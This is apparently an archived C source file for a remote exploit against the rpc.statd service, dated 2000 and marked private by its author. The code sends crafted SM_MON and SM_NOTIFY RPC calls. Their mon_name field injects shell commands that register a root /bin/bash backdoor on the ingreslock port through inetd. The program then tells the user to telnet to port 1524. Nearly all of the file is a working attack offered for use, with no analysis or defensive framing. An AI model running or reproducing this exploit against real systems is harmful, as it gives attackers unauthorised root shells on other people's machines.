home *** CD-ROM | disk | FTP | other *** search
- /*
- *
- * Remote exploit for rpc.statd(remote) - Private, Do not distribute!
- *
- * Written by \x90
- *
- * Greetz to p0rtal, paranoid, digit, f1ex, tmoggie, luke_skyw, pyro,
- * lostie, all in sK, and all the guys on #hax
- *
- * Usage: ./stdz [hostname] [name]
- *
- */
-
-
- #include <stdio.h>
- #include <string.h>
- #include <netdb.h>
- #include <rpc/rpc.h>
- #include <sys/time.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <rpcsvc/sm_inter.h>
-
- int main(int argc, char *argv[])
- {
- CLIENT *cl;
- enum clnt_stat stat;
- struct sm_stat_res monres;
- struct mon monreq;
- struct sockaddr_in target;
- struct hostent *host;
- struct timeval tval;
- struct stat_chge ntz;
- char buf[1024];
- int sockz;
-
- if (argc != 3)
- {
- printf("Statd exploit by \\x90 - PRIVATE!\n\n");
- printf("Usage: %s server name\n", argv[0]);
- exit(0);
- }
-
- bzero(buf, sizeof(buf));
- bzero(&monreq, sizeof(monreq));
-
- sprintf(buf, "; echo \"ingreslock stream tcp nowait root /bin/bash bash\" >> /tmp/.zxc ; /usr/sbin/inetd -s /tmp/.zxc &; rm -f /tmp/.zxc;");
-
- monreq.mon_id.my_id.my_name = argv[2];
- monreq.mon_id.my_id.my_prog = (unsigned long) 100099;
- monreq.mon_id.my_id.my_vers = (unsigned long) 1;
- monreq.mon_id.my_id.my_proc = (unsigned long) 1;
- monreq.mon_id.mon_name = buf;
- monreq.priv[0] = '/';
-
- tval.tv_sec = 9;
- tval.tv_usec = 0;
- ntz.mon_name = buf;
- ntz.state = 1;
-
- host = gethostbyname(argv[1]);
-
- target.sin_family = AF_INET;
- target.sin_addr.s_addr = *(u_long *)host->h_addr;
- target.sin_port = 0;
-
- sockz = RPC_ANYSOCK;
-
- if ( (cl = clntudp_create(&target, SM_PROG, SM_VERS, tval, &sockz)) == NULL)
- {
- printf("Failure.\n");
- exit(0);
- }
-
- stat = clnt_call(cl, SM_MON,(xdrproc_t) xdr_void, &monreq,(xdrproc_t) xdr_void, &monres, tval);
-
- if (stat != RPC_SUCCESS)
- {
- printf("Failure\n");
- exit(0);
- }
-
- stat=clnt_call(cl, SM_NOTIFY, xdr_void, &ntz,xdr_void,NULL,tval);
-
- if (stat != RPC_SUCCESS)
- {
- printf("Failure.\n");
- exit(0);
- }
-
- clnt_destroy(cl);
-
- printf("Worx?, Telnet %s 1524\n", argv[1]);
- exit(0);
- }
- /* www.hack.co.za [2000]*/